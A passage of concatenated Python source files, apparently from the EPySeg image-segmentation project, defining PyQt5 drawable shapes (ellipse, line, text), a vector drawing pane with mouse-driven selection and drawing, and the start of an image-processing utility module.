painter.setOpacity(self.opacity)
if self.color is not None:
pen = QPen(QColor(self.color))
if self.stroke is not None:
pen.setWidthF(self.stroke)
if self.line_style is not None:
if self.line_style in [Qt.SolidLine, Qt.DashLine, Qt.DashDotLine, Qt.DotLine, Qt.DashDotDotLine]:
pen.setStyle(self.line_style)
elif isinstance(self.line_style, list):
pen.setStyle(Qt.CustomDashLine)
pen.setDashPattern(self.line_style)
painter.setPen(pen)
else:
painter.setPen(Qt.NoPen)
if self.fill_color is not None:
painter.setBrush(QBrush(QColor(self.fill_color)))
if draw:
rect_to_plot = self.rect().adjusted(0, 0, 0, 0)
if self.scale is not None and self.scale != 1:
# TODO KEEP THE ORDER THIS MUST BE DONE THIS WAY OR IT WILL GENERATE PLENTY OF BUGS...
new_width = rect_to_plot.width() * self.scale
new_height = rect_to_plot.height() * self.scale
# TODO BE EXTREMELY CAREFUL AS SETX AND SETY CAN CHANGE WIDTH AND HEIGHT --> ALWAYS TAKE SIZE BEFORE OTHERWISE THERE WILL BE A PB AND ALWAYS RESET THE SIZE WHEN SETX IS CALLED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Sets the left edge of the rectangle to the given x coordinate. May change the width, but will never change the right edge of the rectangle. --> NO CLUE WHY SHOULD CHANGE WIDTH THOUGH BUT BE CAREFUL!!!
rect_to_plot.setX(rect_to_plot.x() * self.scale)
rect_to_plot.setY(rect_to_plot.y() * self.scale)
rect_to_plot.setWidth(new_width)
rect_to_plot.setHeight(new_height)
if self.translation is not None:
rect_to_plot.translate(self.translation)
# if self.color is not None:
# painter.drawRect(rect_to_plot)
# else:
# painter.fillRect(rect_to_plot, QColor(self.fill_color))
if self.theta is not None and self.theta != 0:
painter.translate(rect_to_plot.center())
painter.rotate(self.theta)
painter.translate(-rect_to_plot.center())
painter.drawEllipse(rect_to_plot)
painter.restore()
# def fill(self, painter, draw=True):
# if self.fill_color is None:
# return
# if draw:
# painter.save()
# painter.setBrush(QBrush(QColor(self.fill_color)))
# painter.setOpacity(self.opacity)
# if draw:
# painter.drawEllipse(self.rect())
# painter.restore()
#
# # TODO pb will draw the shape twice.... ---> because painter drawpolygon is called twice
#
# def drawAndFill(self, painter):
# painter.save()
# self.draw(painter, draw=False)
# self.fill(painter, draw=False)
# painter.drawEllipse(self.rect())
# painter.restore()
def translate(self, translation):
self.moveBy(translation.x(), translation.y())
rect = self.rect()
rect.translate(translation.x(), translation.y())
self.setRect(rect)
def add(self, *args):
p1 = args[0]
p2 = args[1]
rect = self.rect()
rect.setWidth(abs(p1.x()-p2.x()))
rect.setHeight(abs(p1.y()-p2.y()))
x = p2.x()
y = p2.y()
if p1.x() < p2.x():
x = p1.x()
if p1.y() < p2.y():
y = p1.y()
rect.setX(x)
rect.setY(y)
self.setRect(rect)
self.isSet = True
def boundingRect(self):
# should I return the scaled version or the orig --> think about it...
rect_to_plot = self.rect().adjusted(0, 0, 0, 0)
try:
# print('tada')
if self.theta is not None and self.theta!=0:
# print('entering')
center = rect_to_plot.center()
# print('entering2')
t = QTransform().translate(center.x(), center.y()).rotate(self.theta).translate(-center.x(),
-center.y())
# print('entering3')
# self.setTransform(t)
# self.transform()
# transformed = QRectF(self.rect())
# print('entering5', transformed)
# self.resetTransform()
# print('entering5', rect_to_plot)
# print('entering4')
transformed = t.mapRect(rect_to_plot)
# self.setTransform(t)
# self.transform()
#
# print(self.shape().boundingRect())
#
# # print(self.rect(), transformed)
#
# transformed = QRectF(self.shape().boundingRect())
# # self.resetTransform()
# not perfect but ok for now though --> bounds are not sharp at the edges upon rotation
# print('entering45', transformed)
return transformed
except:
pass
return rect_to_plot
def get_P1(self):
return self.boundingRect().topLeft()
def set_P1(self, point):
rect = self.rect()
width = rect.width()
height = rect.height()
rect.setX(point.x())
rect.setY(point.y())
# required due to setX changing width and sety changing height
rect.setWidth(width)
rect.setHeight(height)
self.setRect(rect)
def set_to_scale(self, factor):
self.scale = factor
def set_to_translation(self, translation):
self.translation = translation
if __name__ == '__main__':
    # this works --> here are two example shapes
test = Ellipse2D(0, 0, 100, 100)
# print(test.x(), test.y(), test.width(), test.height())
print(test.contains(QPointF(50, 50)))
print(test.contains(QPointF(15, 15)))
print(test.contains(QPointF(-1, -1)))
print(test.contains(QPointF(0, 0)))
print(test.contains(QPointF(100, 100)))
print(test.contains(QPointF(100, 100.1)))
print(test.x())
print(test.y())
print(test.translate(QPoint(10, 10)))
print(test.x())
print(test.y())
# p1 = test.p1()
# print(p1.x(), p1.y())
# p2 = test.p2()
# print(p2.x(), p2.y())
# print(test.arrow)
# print(test.length()) # sqrt 2 --> 141
# # if it's an arrow I can add easily all the stuff I need
#
# test = Rect2D(0, 0, 1, 1)
# p1 = test.p1()
# print(p1.x(), p1.y())
# p2 = test.p2()
# print(p2.x(), p2.y())
# print(test.arrow)
# import math
# print(test.length() == math.sqrt(2)) # sqrt 2
#
# test2 = Rect2D()
# p1 = test2.p1()
# print(p1.x(), p1.y())
# p2 = test2.p2()
# print(p2.x(), p2.y())
# print(test2.arrow)
```
#### File: draw/shapes/line2d.py
```python
from PyQt5.QtCore import QPointF, QLineF, QRectF, QPoint, Qt
from PyQt5.QtGui import QBrush, QPen, QColor, QTransform
from math import sqrt
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class Line2D(QLineF):
def __init__(self, *args, color=0xFFFF00, opacity=1., stroke=0.65, arrow=False, line_style=None, theta=0, **kwargs):
super(Line2D, self).__init__(*args)
if not args:
self.isSet = False
else:
self.isSet = True
self.arrow = arrow
self.color = color
self.stroke = stroke
self.opacity = opacity
self.scale = 1
self.translation = QPointF()
self.line_style = line_style
# rotation
self.theta = theta
def set_rotation(self, theta):
self.theta = theta
def set_opacity(self, opacity):
self.opacity = opacity
    def set_line_style(self, style):
        '''allows the line to be dashed, dotted or follow a custom pattern

        :param style: one of Qt.SolidLine, Qt.DashLine, Qt.DashDotLine, Qt.DotLine or Qt.DashDotDotLine, or a list of numbers (in which case Qt.CustomDashLine is assumed and the list is used as the dash pattern); None resets the line to a plain solid line
        :return:
        '''
        self.line_style = style
        # if style is a list, a custom dash pattern is assumed; otherwise the given Qt pen style is applied at draw time
def draw(self, painter, draw=True):
if self.color is None:
return
if draw:
painter.save()
pen = QPen(QColor(self.color))
if self.stroke is not None:
pen.setWidthF(self.stroke)
if self.line_style is not None:
if self.line_style in [Qt.SolidLine, Qt.DashLine, Qt.DashDotLine, Qt.DotLine, Qt.DashDotDotLine]:
pen.setStyle(self.line_style)
elif isinstance(self.line_style, list):
pen.setStyle(Qt.CustomDashLine)
pen.setDashPattern(self.line_style)
painter.setPen(pen)
painter.setOpacity(self.opacity)
if draw:
# clone the line
line_to_plot = self.translated(0, 0)
if self.scale is not None and self.scale != 1:
p1 = line_to_plot.p1()
p2 = line_to_plot.p2()
line_to_plot.setP1(QPointF(p1.x()*self.scale, p1.y()*self.scale))
line_to_plot.setP2(QPointF(p2.x()*self.scale, p2.y()*self.scale))
if self.translation is not None:
line_to_plot.translate(self.translation)
# print(line_to_plot)
if self.theta is not None and self.theta != 0:
painter.translate(line_to_plot.center())
painter.rotate(self.theta)
painter.translate(-line_to_plot.center())
painter.drawLine(line_to_plot)
painter.restore()
#
# def fill(self, painter, draw=True):
# if draw:
# painter.save()
# if self.fill_color is None:
# return
# painter.setBrush(QBrush(QColor(self.fill_color)))
# painter.setOpacity(self.opacity)
# if draw:
# painter.drawLine(self)
# painter.restore()
#
# def drawAndFill(self, painter):
# painter.save()
# self.draw(painter, draw=False)
# self.fill(painter, draw=False)
# painter.drawLine(self)
# painter.restore()
def contains(self, *args):
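        # A point "hits" the line when it lies within 10 px of the segment
        # and inside the line's bounding rectangle.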
x = 0
y = 0
if isinstance(args[0], QPoint) or isinstance(args[0], QPointF):
x = args[0].x()
y = args[0].y()
else:
x = args[0]
y = args[1]
return self.distToSegment(QPointF(x, y), self.p1(), self.p2()) < 10 and self.boundingContains(*args)
def lineFromPoints(self, x1, y1, x2, y2):
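        # Implicit form a*x + b*y = c of the line through (x1, y1) and (x2, y2).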
a = y2 - y1
b = x1 - x2
c = a * x1 + b * y1
return (a, b, c)
def len(self, v, w):
return (v.x() - w.x()) ** 2 + (v.y() - w.y()) ** 2
def distToSegment(self, p, v, w):
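        # Distance from point p to the segment [v, w]: project p onto the
        # supporting line, clamp the projection parameter t to [0, 1], and
        # return the distance from p to the clamped point.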
l2 = self.len(v, w)
if l2 == 0:
return self.len(p, v)
t = ((p.x() - v.x()) * (w.x() - v.x()) + (p.y() - v.y()) * (w.y() - v.y())) / l2
t = max(0, min(1, t))
return sqrt(self.len(p, QPointF(v.x() + t * (w.x() - v.x()), v.y() + t * (w.y() - v.y()))))
def boundingContains(self, *args):
return self.boundingRect().contains(*args)
# def boundingRect(self, scaled=True):
# scale = 1
# if not scaled and self.scale is not None:
# scale = self.scale
# return QRectF(min(self.p1().x(), self.p2().x()) * scale, min(self.p1().y(), self.p2().y()) * scale,
# abs(self.p2().x() - self.p1().x()) * scale, abs(self.p2().y() - self.p1().y()) * scale)
# TODO handle scale etc
def boundingRect(self):
rect = QRectF(min(self.p1().x(), self.p2().x()), min(self.p1().y(), self.p2().y()),
abs(self.p2().x() - self.p1().x()), abs(self.p2().y() - self.p1().y()))
try:
# print('tada')
if self.theta is not None and self.theta != 0:
# print('entering')
center = rect.center()
# print('entering2')
t = QTransform().translate(center.x(), center.y()).rotate(self.theta).translate(-center.x(),
-center.y())
# print('entering3')
# transformed = self.setTransform(t)
# print('entering4')
# print(transformed)
# print(QRectF(min(transformed.p1().x(), transformed.p2().x()), min(transformed.p1().y(), transformed.p2().y()),
# abs(transformed.p2().x() - transformed.p1().x()), abs(transformed.p2().y() - transformed.p1().y())))
# return QRectF(min(transformed.p1().x(), transformed.p2().x()), min(transformed.p1().y(), transformed.p2().y()),
# abs(transformed.p2().x() - transformed.p1().x()), abs(transformed.p2().y() - transformed.p1().y()))
# copy.setT
# print('entering')
# t = QTransform().translate( center.x(), center.y()).rotate(self.theta).translate(-center.x(), -center.y())
# # print('entersd')
transformed = t.map( self) #// mapRect() returns the bounding rect of the rotated rect
# print('rotated',rotatedRect )
# return rotatedRect
return QRectF(min(transformed.p1().x(), transformed.p2().x()),
min(transformed.p1().y(), transformed.p2().y()),
abs(transformed.p2().x() - transformed.p1().x()), abs(transformed.p2().y() - transformed.p1().y()))
except:
pass
return rect
def add(self, *args):
point = args[1]
self.setP2(point)
self.isSet = True
def set_to_scale(self, factor):
self.scale = factor
def set_to_translation(self, translation):
self.translation = translation
def get_P1(self):
return self.boundingRect().topLeft()
    # do not use QLineF.setP1 directly here, otherwise problems --> the goal is to reposition the whole line, not to call the endpoint setter
def set_P1(self, point):
current_pos = self.boundingRect().topLeft()
self.translate(point.x() - current_pos.x(), point.y() - current_pos.y())
# self.translate(self.translation)
# if not args:
# logger.error("no coordinate set...")
# return
# if len(args) == 1:
# self.setP1(args[0])
# else:
# self.setP1(QPointF(args[0], args[1]))
# def set_P2(self,*args):
# if not args:
# logger.error("no coordinate set...")
# return
# if len(args) == 1:
# self.setP2(args[0])
# else:
# self.setP2(QPointF(args[0], args[1]))
def erode(self, nb_erosion=1):
self.__computeNewMorphology(sizeChange=-nb_erosion)
def dilate(self, nb_dilation=1):
self.__computeNewMorphology(sizeChange=nb_dilation)
    def __computeNewMorphology(self, sizeChange=1):
        currentBoundingRect = self.boundingRect()
        curWidth = currentBoundingRect.width()
        finalWidth = curWidth + 2. * sizeChange
        if finalWidth < 1:
            finalWidth = 1
        center2D = QPointF(currentBoundingRect.center().x(), currentBoundingRect.center().y())
        # boundingRect() takes no 'scaled' argument and returns the unscaled
        # rect, so divide by the current (unscaled) width
        scale = finalWidth / curWidth
        print('new scale', scale)
        self.set_to_scale(scale)
        # need to translate according to the center, otherwise ok
        # self.setCenter(center2D)
if __name__ == '__main__':
    # this works --> here are two example shapes
test = Line2D(0, 0, 100, 100, arrow=True)
print(test.lineFromPoints(0, 0, 100, 100))
print(test.contains(0, 0)) # true
print(test.contains(10, 10)) # true
print(test.contains(-10, -10)) # false # on line with that equation but outside range
print(test.contains(0, 18)) # false
p1 = test.p1()
print(p1.x(), p1.y())
p2 = test.p2()
print(p2.x(), p2.y())
print(test.arrow)
print(test.length()) # sqrt 2 --> 141
# if it's an arrow I can add easily all the stuff I need
test = Line2D(0, 0, 1, 1)
p1 = test.p1()
print(p1.x(), p1.y())
p2 = test.p2()
print(p2.x(), p2.y())
print(test.arrow)
import math
print(test.length() == sqrt(2)) # sqrt 2
test2 = Line2D()
p1 = test2.p1()
print(p1.x(), p1.y())
p2 = test2.p2()
print(p2.x(), p2.y())
print(test2.arrow)
```
#### File: draw/shapes/txt2d.py
```python
from PyQt5 import QtCore
from PyQt5.QtCore import QPointF, QRect
from PyQt5.QtGui import QTextDocument, QTextOption
from PyQt5.QtGui import QPainter, QImage, QColor, QFont
import sys
from PyQt5 import QtGui
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication
from epyseg.draw.shapes.rect2d import Rect2D
# log errors
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class TAText2D(Rect2D):
# TODO add bg to it so that it can be drawn
def __init__(self, text=None, doc=None, opacity=1., *args, **kwargs):
if doc is not None and isinstance(doc, QTextDocument):
self.doc = doc
self.doc.setDocumentMargin(0) # important so that the square is properly placed
else:
self.doc = QTextDocument()
self.doc.setDocumentMargin(0) # important so that the square is properly placed
textOption = self.doc.defaultTextOption()
textOption.setWrapMode(QTextOption.NoWrap)
self.doc.setDefaultTextOption(textOption)
if text is not None:
self.doc.setHtml(text)
self.isSet = True
self.doc.adjustSize()
size = self.getSize()
super(TAText2D, self).__init__(0, 0, size.width(), size.height())
self.opacity = opacity
def set_opacity(self, opacity):
self.opacity = opacity
    def setText(self, html):
        self.doc.setHtml(html)
        self.doc.adjustSize()
        size = self.getSize()
        # QRectF.setWidth/setHeight each take a single value
        self.setWidth(size.width())
        self.setHeight(size.height())
    def setDoc(self, doc):
        self.doc = doc
        self.doc.setDocumentMargin(0)
        self.doc.adjustSize()
        size = self.getSize()
        self.setWidth(size.width())
        self.setHeight(size.height())
def draw(self, painter):
painter.save()
painter.setOpacity(self.opacity)
painter.translate(self.x(), self.y())
self.doc.drawContents(painter)
painter.restore()
# maybe activate this upon debug
# painter.save()
# painter.setPen(QtCore.Qt.red)
# painter.drawRect(self)
# painter.restore()
def boundingRect(self):
return self
def getSize(self):
return self.doc.size()
def getWidth(self):
return self.boundingRect().width()
def getHeight(self):
return self.boundingRect().height()
def set_P1(self, *args):
if not args:
logger.error("no coordinate set...")
return
if len(args) == 1:
self.moveTo(args[0].x(), args[0].y())
else:
self.moveTo(QPointF(args[0], args[1]))
def get_P1(self):
return QPointF(self.x(), self.y())
def getPlainText(self):
return self.doc.toPlainText()
def getHtmlText(self):
return self.doc.toHtml()
if __name__ == '__main__':
# this could be a pb ...
app = QApplication(sys.argv)# IMPORTANT KEEP !!!!!!!!!!!
# window = MyWidget()
# window.show()
    # this works because it overrides the default color of the widget
    # it's perfect and 2000X easier than in Java --> cool
html = '<!DOCTYPE html> <html> <font color=red> <head> <title>Font Face</title> </head> <body> <font face = "Symbol" size = "5">Symbol</font><br /> <font face = "Times New Roman" size = "5">Times New Roman</font><br /> <font face = "Verdana" size = "5">Verdana</font><br /> <font face = "Comic sans MS" size =" 5">Comic Sans MS</font><br /> <font face = "WildWest" size = "5">WildWest</font><br /> <font face = "Bedrock" size = "5">Bedrock</font><br /> </body> </html>'
# html = "<font color=blue size=24>this is a test<sup>2</sup><br></font><font color=green size=12>continued<sub>1</sub><br></font><font color=white size=12>test greek <font face='Symbol' size=32>a</font> another α<font face='Arial' color='Orange'>I am a sentence!</font>"
text = TAText2D(html)
# hexagon.append(QPointF(10, 20))
print(text)
# print(hexagon.translate(10, 20)) # why none ???
# translate and so on can all be saved...
image = QImage('./../data/handCorrection.png')
# image = QImage(QSize(400, 300), QImage.Format_RGB32)
painter = QPainter()
painter.begin(image)
# painter.setOpacity(0.3);
painter.drawImage(0, 0, image)
painter.setPen(QtCore.Qt.blue)
text.opacity = 0.7
painter.translate(10, 20)
painter.setPen(QColor(168, 34, 3))
text.draw(painter) # this works; it could be overloaded to handle svg too
painter.drawRect(text)# try to draw the bounds
# painter.setPen(QtCore.Qt.green)
# painter.setFont(QFont('SansSerif', 50))
painter.setFont(QFont('Decorative', 10))
# painter.drawText(256, 256, "this is a test")
# nothing works it just doesn't draw for unknown reason ????
# painter.drawText(QRect(60,60,256,256), Qt.AlignCenter, "this is a test")
painter.setPen(QtGui.QColor(200, 0, 0))
# painter.drawText(20, 20, "MetaGenerator") # crashes the software --> why exit(139) ...
painter.drawText(QRect(60,60,256,256), Qt.AlignCenter, "Text centered in the drawing area")
# painter.drawText(QRect(100, 100, 200, 100), "Text you want to draw...");
print('here')
painter.end()
# image = QImage(QSize(400, 300), QImage::Format_RGB32);
# QPainter
# painter( & image);
# painter.setBrush(QBrush(Qt::green));
# painter.fillRect(QRectF(0, 0, 400, 300), Qt::green);
# painter.fillRect(QRectF(100, 100, 200, 100), Qt::white);
# painter.setPen(QPen(Qt::black));
# painter.save()
# painter.setCompositionMode(QtGui.QPainter.CompositionMode_Clear)
# painter.eraseRect(r)
# painter.restore()
print('saving', './../trash/test_pyQT_draw_text.png')
image.save('./../trash/test_pyQT_draw_text.png', "PNG")
# split text and find bounding rect of the stuff --> so that it is well positioned
# or do everything in svg and just show what's needed ???
# not bad; TODO write a draw-anything class that draws whatever shape it is given, with color, transparency, ... parameters
# everything works quite well and it is very fast
sys.exit(0)
```
#### File: draw/widgets/vectorial.py
```python
from PyQt5 import QtCore
from epyseg.draw.shapes.polygon2d import Polygon2D
from epyseg.draw.shapes.line2d import Line2D
from epyseg.draw.shapes.rect2d import Rect2D
from epyseg.draw.shapes.square2d import Square2D
from epyseg.draw.shapes.ellipse2d import Ellipse2D
from epyseg.draw.shapes.circle2d import Circle2D
from epyseg.draw.shapes.freehand2d import Freehand2D
from epyseg.draw.shapes.point2d import Point2D
from epyseg.draw.shapes.polyline2d import PolyLine2D
from epyseg.draw.shapes.image2d import Image2D
from PyQt5.QtCore import QPointF, QRectF
# logging
from epyseg.tools.logger import TA_logger
logger = TA_logger()
class VectorialDrawPane:
def __init__(self, active=False, demo=False, scale=1.0, drawing_mode=False):
self.shapes = []
self.currently_drawn_shape = None
self.shape_to_draw = None
self.selected_shape = []
self.active = active
self.scale = scale
self.drawing_mode = drawing_mode
if demo:
self.shapes.append(Polygon2D(0, 0, 10, 0, 10, 20, 0, 20, 0, 0, color=0x00FF00))
self.shapes.append(
Polygon2D(100, 100, 110, 100, 110, 120, 10, 120, 100, 100, color=0x0000FF, fill_color=0x00FFFF,
stroke=2))
self.shapes.append(Line2D(0, 0, 110, 100, color=0xFF0000, stroke=3))
self.shapes.append(Rect2D(200, 150, 250, 100, stroke=10))
self.shapes.append(Square2D(300, 260, 250, stroke=3))
self.shapes.append(Ellipse2D(0, 50, 600, 200, stroke=3))
self.shapes.append(Circle2D(150, 300, 30, color=0xFF0000))
self.shapes.append(PolyLine2D(10, 10, 20, 10, 20, 30, 40, 30, color=0xFF0000, stroke=2))
self.shapes.append(PolyLine2D(10, 10, 20, 10, 20, 30, 40, 30, color=0xFF0000, stroke=2))
self.shapes.append(Point2D(128, 128, color=0xFF0000, stroke=6))
self.shapes.append(Point2D(128, 128, color=0x00FF00, stroke=1))
self.shapes.append(Point2D(10, 10, color=0x000000, stroke=6))
img0 = Image2D('./../data/counter/00.png')
img1 = Image2D('./../data/counter/01.png')
img2 = Image2D('./../data/counter/02.png')
img3 = Image2D('./../data/counter/03.png')
img4 = Image2D('./../data/counter/04.png')
img5 = Image2D('./../data/counter/05.png')
img6 = Image2D('./../data/counter/06.png')
img7 = Image2D('./../data/counter/07.png')
img8 = Image2D('./../data/counter/08.png')
img9 = Image2D('./../data/counter/09.png')
img10 = Image2D('./../data/counter/10.png')
row = img1 + img2 + img10
self.shapes.append(row)
row2 = img4 + img5
fig = row / row2
# fig = Column(row, row2)
#self.shapes.append(fig)
self.drawing_mode = True
# self.shape_to_draw = Line2D
# self.shape_to_draw = Rect2D
# self.shape_to_draw = Square2D
# self.shape_to_draw = Ellipse2D
# self.shape_to_draw = Circle2D
# self.shape_to_draw = Point2D # ok maybe small centering issue
# self.shape_to_draw = Freehand2D
# self.shape_to_draw = PolyLine2D
# self.shape_to_draw = Polygon2D
import random
drawing_methods = [Line2D, Rect2D, Square2D, Ellipse2D, Circle2D, Point2D, Freehand2D, PolyLine2D, Polygon2D]
self.shape_to_draw = random.choice(drawing_methods)
# TODO freehand drawing
# TODO polyline --> needs a double click to end
def paintEvent(self, *args):
painter = args[0]
visibleRect = None
if len(args) >= 2:
visibleRect = args[1]
painter.save()
if self.scale != 1.0:
painter.scale(self.scale, self.scale)
for shape in self.shapes:
# only draw shapes if they are visible --> requires a visiblerect to be passed
if visibleRect is not None:
# only draws if in visible rect
if shape.boundingRect().intersects(QRectF(visibleRect)):
shape.draw(painter)
else:
shape.draw(painter)
if self.currently_drawn_shape is not None:
if self.currently_drawn_shape.isSet:
self.currently_drawn_shape.draw(painter)
sel = self.create_master_rect()
if sel is not None:
painter.drawRect(sel)
painter.restore()
def group_contains(self, x, y):
# checks if master rect for group contains click
# get bounds and create union and compare
master_rect = self.create_master_rect()
if master_rect is None:
return False
return master_rect.contains(QPointF(x, y))
def create_master_rect(self):
master_rect = None
if self.selected_shape:
for shape in self.selected_shape:
if master_rect is None:
master_rect = shape.boundingRect()
else:
master_rect = master_rect.united(shape.boundingRect())
return master_rect
def removeCurShape(self):
if self.selected_shape:
self.shapes = [e for e in self.shapes if e not in self.selected_shape]
self.selected_shape = []
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.drawing = True
self.lastPoint = event.pos() / self.scale
self.firstPoint = event.pos() / self.scale
shapeFound = False
if self.currently_drawn_shape is None:
for shape in reversed(self.shapes):
if shape.contains(self.lastPoint) and shape not in self.selected_shape:
logger.debug('you clicked shape:' + str(shape))
if event.modifiers() == QtCore.Qt.ControlModifier:
if shape not in self.selected_shape: # avoid duplicates
self.selected_shape.append(shape) # add shape to group
logger.debug('adding shape to group')
shapeFound = True
else:
if not self.group_contains(self.lastPoint.x(), self.lastPoint.y()):
self.selected_shape = [shape]
logger.debug('only one element is selected')
shapeFound = True
return
if not shapeFound and event.modifiers() == QtCore.Qt.ControlModifier:
for shape in reversed(self.shapes):
if shape.contains(self.lastPoint):
if shape in self.selected_shape: # already selected
logger.debug('you clicked again shape:' + str(shape))
self.selected_shape.remove(shape) # remove shape from group
logger.debug('removing a shape from group')
shapeFound = True
# no shape found --> reset sel
if not shapeFound and not self.group_contains(self.lastPoint.x(), self.lastPoint.y()):
logger.debug('resetting sel')
self.selected_shape = []
# check if a shape is selected and only move that
if self.drawing_mode and not self.selected_shape and self.currently_drawn_shape is None:
# do not reset shape if not done drawing...
if self.shape_to_draw is not None:
self.currently_drawn_shape = self.shape_to_draw()
else:
self.currently_drawn_shape = None
if self.drawing_mode and not self.selected_shape:
if self.currently_drawn_shape is not None:
self.currently_drawn_shape.set_P1(QPointF(self.lastPoint.x(), self.lastPoint.y()))
def mouseMoveEvent(self, event):
if event.buttons() & QtCore.Qt.LeftButton: # bitwise test; 'and' would be truthy for any pressed button
if self.selected_shape and self.currently_drawn_shape is None:
logger.debug('moving' + str(self.selected_shape))
for shape in self.selected_shape:
shape.translate(event.pos() / self.scale - self.lastPoint)
if self.currently_drawn_shape is not None:
self.currently_drawn_shape.add(self.firstPoint, self.lastPoint)
self.lastPoint = event.pos() / self.scale
def mouseReleaseEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.drawing = False
if self.drawing_mode and self.currently_drawn_shape is not None:
self.currently_drawn_shape.add(self.firstPoint, self.lastPoint)
if isinstance(self.currently_drawn_shape, Freehand2D):
# this closes the freehand shape
self.currently_drawn_shape.add(self.lastPoint, self.firstPoint)
# should not erase the shape if it's a polyline or a polygon by the way
if not isinstance(self.currently_drawn_shape, PolyLine2D) and not isinstance(self.currently_drawn_shape, Polygon2D):
self.shapes.append(self.currently_drawn_shape)
self.currently_drawn_shape = None
def mouseDoubleClickEvent(self, event):
if isinstance(self.currently_drawn_shape, PolyLine2D) or isinstance(self.currently_drawn_shape, Polygon2D):
self.shapes.append(self.currently_drawn_shape)
self.currently_drawn_shape = None
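# Hedged usage sketch: this pane is meant to be embedded in a QWidget that
# forwards its paint and mouse events; the host widget below is an assumption,
# not part of this module.
# pane = VectorialDrawPane(active=True, drawing_mode=True)
# pane.shapes.append(Rect2D(10, 10, 50, 30, stroke=2))
# # from the host widget: pane.paintEvent(painter) and
# # pane.mousePressEvent(event) / mouseMoveEvent(event) / mouseReleaseEvent(event)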
if __name__ == '__main__':
VectorialDrawPane()
```
#### File: EPySeg/epyseg/img.py
```python
from epyseg.tools.logger import TA_logger
logger = TA_logger() # logging_level=TA_logger.DEBUG
import random
import os
import read_lif # read Leica .lif files (requires numexpr)
from builtins import super, int
import warnings
import skimage
from skimage import io
from PIL import Image
import tifffile # open Zeiss .tif and .lsm files
import czifile # open .czi spim files
import glob
from skimage.transform import rescale
from skimage.util import img_as_ubyte
import scipy.signal # convolution of images
import numpy as np
import json
from PyQt5.QtGui import QImage, QColor # allows for qimage creation
from natsort import natsorted # sort strings as humans would do
import xml.etree.ElementTree as ET # to handle xml metadata of images
import base64
import io # NB this re-binds the name 'io' (shadows skimage.io imported above)
import matplotlib.pyplot as plt
import traceback
from skimage.morphology import white_tophat, black_tophat, disk
from skimage.morphology import square, ball, diamond, octahedron, rectangle
# for future development
# np = None
# try:
# np = __import__('cupy') # 3d accelerated numpy
# except:
# np = __import__('numpy')
def RGB_to_int24(RGBimg):
RGB24 = (RGBimg[..., 0].astype(np.uint32) << 16) | (RGBimg[..., 1].astype(np.uint32) << 8) | RGBimg[..., 2].astype(
np.uint32)
return RGB24
def int24_to_RGB(RGB24):
RGBimg = np.zeros(shape=(*RGB24.shape, 3), dtype=np.uint8)
for c in range(RGBimg.shape[-1]):
RGBimg[..., c] = (RGB24 >> ((RGBimg.shape[-1] - c - 1) * 8)) & 0xFF
return RGBimg
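# Minimal round-trip sketch (assumes a uint8 RGB array; the packed value is easy
# to check by hand: 0xFF8003 == 255<<16 | 128<<8 | 3 == 16744451):
# rgb = np.array([[[255, 128, 3]]], dtype=np.uint8)
# packed = RGB_to_int24(rgb)                  # array([[16744451]], dtype=uint32)
# np.array_equal(int24_to_RGB(packed), rgb)   # True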
# work in progress please don't use
# works but dark --> should rather use alpha compositing, I think that's closer to what I want
# TODO maybe also use a mask --> for example exclude all black/0 bg pixels
# blended = __create_composite(bg, fg, 0.1)
# not bad but also try composite
def __create_composite(background, foreground, mask, alpha=0.3):
# print(background.shape, background.dtype)
# print(foreground.shape, foreground.dtype)
# to blend the images need be single channels
bg = background
if not isinstance(bg, Image.Image):
if bg.dtype == np.dtype(np.float32):
# there is a bug in normalization or in img_as_ubyte --> the final image is almost completely black
bg = Img.normalization(bg, method='Rescaling (min-max normalization)', range=[0,1], clip=True)
# Img(bg, dimensions='hw').save('/D/Sample_images/segmentation_assistant/ovipo_uncropped/trash_me_norm.tif')
#
# print(bg.dtype, bg.max(), bg.min()) # there is a bug there --> need fix it rapidly
# bg = img_as_ubyte(bg) --> bug here the conversion is terrible all signal is lost --> do it manually
bg = (bg*255).astype(np.uint8)
# print(bg.shape, bg.dtype, bg.max(), bg.min())
# why is that all black ???
# Img(bg, dimensions='hw').save('/D/Sample_images/segmentation_assistant/ovipo_uncropped/trash_me.tif')
# bg = (bg/bg.max())*255
# bg = bg.astype(np.uint8) # dirty ... do that better --> TODO
bg = Image.fromarray(bg)
# bg.show()
fg = foreground
if not isinstance(fg, Image.Image):
if fg.dtype == np.dtype(np.float32):
fg = Img.normalization(fg, method='Rescaling (min-max normalization)', range=[0, 1], clip=True)
fg = (fg * 255).astype(np.uint8)
# fg = img_as_ubyte(fg)
# fg = (fg/fg.max())*255
# fg = fg.astype(np.uint8) # dirty ... do that better --> TODO
fg = Image.fromarray(fg)
# TODO also try composite because that maybe what I want to have in fact
# Image.composite
# Image.alpha_composite --> maybe exactly what I want or code my own version in pure numpy --> that would be useful
# https://pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.Image.convert
# print('bg.mode',bg.mode)
# print('fg.mode',fg.mode)
# Image.convert
if bg.mode != fg.mode:
# images are incompatible --> need convert one or the other to the other type
if bg.mode == 'RGB' or fg.mode == 'RGB':
if bg.mode == 'L' or bg.mode == 'F':
bg = bg.convert(mode="RGB")
# print('bg.mode', bg.mode)
if fg.mode == 'L' or fg.mode == 'F':
fg = fg.convert(mode="RGB")
# composite fraction assume 8 bits?
bg.putalpha(255)
fg.putalpha(int(alpha*255))
# print('bg.mode', bg.mode)
# print('fg.mode', fg.mode)
# result = Image.blend(bg,fg, alpha=alpha)
# result = Image.alpha_composite(bg,fg)
# NB mask need be a PIL image too --> all of this is so slow and so many conversions ...
if mask is not None:
result = Image.composite(bg,fg, mask) # ignore pure black pixels #TODO handle masks
else:
result = Image.alpha_composite(bg, fg)
return result # nb this is a PIL image --> do I want to make it directly as a numpy array ???
# somehow tophat does not work for 3D but why ???
def get_nb_of_series_in_lif(lif_file_name):
if not lif_file_name or not lif_file_name.lower().endswith('.lif'):
logger.error('Error only lif file supported')
return None
reader = read_lif.Reader(lif_file_name)
series = reader.getSeries()
return len(series)
# TODO maybe make one that does the same with ROIs ???
# if return mask then I just return the mask with boolean and not the
def mask_rows_or_columns(img, spacing_X=2, spacing_Y=None, masking_value=0, return_boolean_mask=False,
